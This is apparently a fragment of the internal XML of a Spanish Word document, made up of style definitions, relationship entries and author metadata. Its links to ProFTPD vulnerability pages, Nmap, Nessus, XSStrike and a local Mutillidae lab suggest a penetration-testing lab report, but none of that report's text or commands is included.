    <w:rsid w:val="00C57A0A"/>
    <w:rsid w:val="00C60470"/>
    <w:rsid w:val="00C70EA2"/>
    <w:rsid w:val="00C85AEF"/>
    <w:rsid w:val="00C94B1E"/>
    <w:rsid w:val="00C94F51"/>
    <w:rsid w:val="00CB12B5"/>
    <w:rsid w:val="00CB6567"/>
    <w:rsid w:val="00CB6BBB"/>
    <w:rsid w:val="00CE1018"/>
    <w:rsid w:val="00D11DC1"/>
    <w:rsid w:val="00D27E7D"/>
    <w:rsid w:val="00D342C7"/>
    <w:rsid w:val="00D3791B"/>
    <w:rsid w:val="00D41E7C"/>
    <w:rsid w:val="00D66F5D"/>
    <w:rsid w:val="00D75565"/>
    <w:rsid w:val="00D75F04"/>
    <w:rsid w:val="00DA7388"/>
    <w:rsid w:val="00DF477E"/>
    <w:rsid w:val="00E14E9B"/>
    <w:rsid w:val="00E26D05"/>
    <w:rsid w:val="00E32AD2"/>
    <w:rsid w:val="00E4059A"/>
    <w:rsid w:val="00E56D03"/>
    <w:rsid w:val="00E87029"/>
    <w:rsid w:val="00E92449"/>
    <w:rsid w:val="00E961D1"/>
    <w:rsid w:val="00EB694B"/>
    <w:rsid w:val="00ED68C0"/>
    <w:rsid w:val="00EE105F"/>
    <w:rsid w:val="00EE2C3A"/>
    <w:rsid w:val="00EF0D89"/>
    <w:rsid w:val="00F0166E"/>
    <w:rsid w:val="00F1026F"/>
    <w:rsid w:val="00F10B88"/>
    <w:rsid w:val="00F12797"/>
    <w:rsid w:val="00F14EA6"/>
    <w:rsid w:val="00F843F9"/>
    <w:rsid w:val="00F90E32"/>
    <w:rsid w:val="00F93190"/>
    <w:rsid w:val="00F96825"/>
    <w:rsid w:val="00FE22FB"/>
    <w:rsid w:val="00FE666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9BC2C6"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E4C52662-9ACC-4C58-B670-1B68D45EA1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B628E"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hipervnculo">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27E7D"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Mencinsinresolver">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D27E7D"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="nfasis">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="0094192F"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D27DE"/>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0D27DE"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CdigoHTML">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000D27D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860231">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="693455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8.png"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image95.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/products/cpe/detail/659328?keyword=cpe%3A2.3%3Aa%3Aproftpd%3Aproftpd%3A1.3.5%3A-%3A*%3A*%3A*%3A*%3A*%3A*&amp;status=FINAL,DEPRECATED&amp;orderBy=CPEURI&amp;namingFormat=2.3"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hyperlink" Target="https://facebook.com/" TargetMode="External"/><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yperlink" Target="https://www.cvedetails.com" TargetMode="External"/><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theme" Target="theme/theme1.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5.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0.png"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/nse-usage.html" TargetMode="External"/><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7.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image" Target="media/image3.png"/><Relationship Id="rId71" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.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192.168.52.134/mutillidae/index.php" TargetMode="External"/><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vimeo.com/249060325" TargetMode="External"/><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52.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hyperlink" Target="https://kali:8834/" TargetMode="External"/><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image" Target="media/image4.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4.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6.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hyperlink" Target="https://github.com/s0md3v/XSStrike.git" TargetMode="External"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.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2221</TotalTime>
  <Pages>1</Pages>
  <Words>7134</Words>
  <Characters>39243</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>327</Lines>
  <Paragraphs>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Eliezer Cabrales Calvente</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Eliezer Cabrales Calvente</cp:lastModifiedBy>
  <cp:revision>153</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-10T10:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-07T22:29:00Z</dcterms:modified>
</cp:coreProperties>
</file>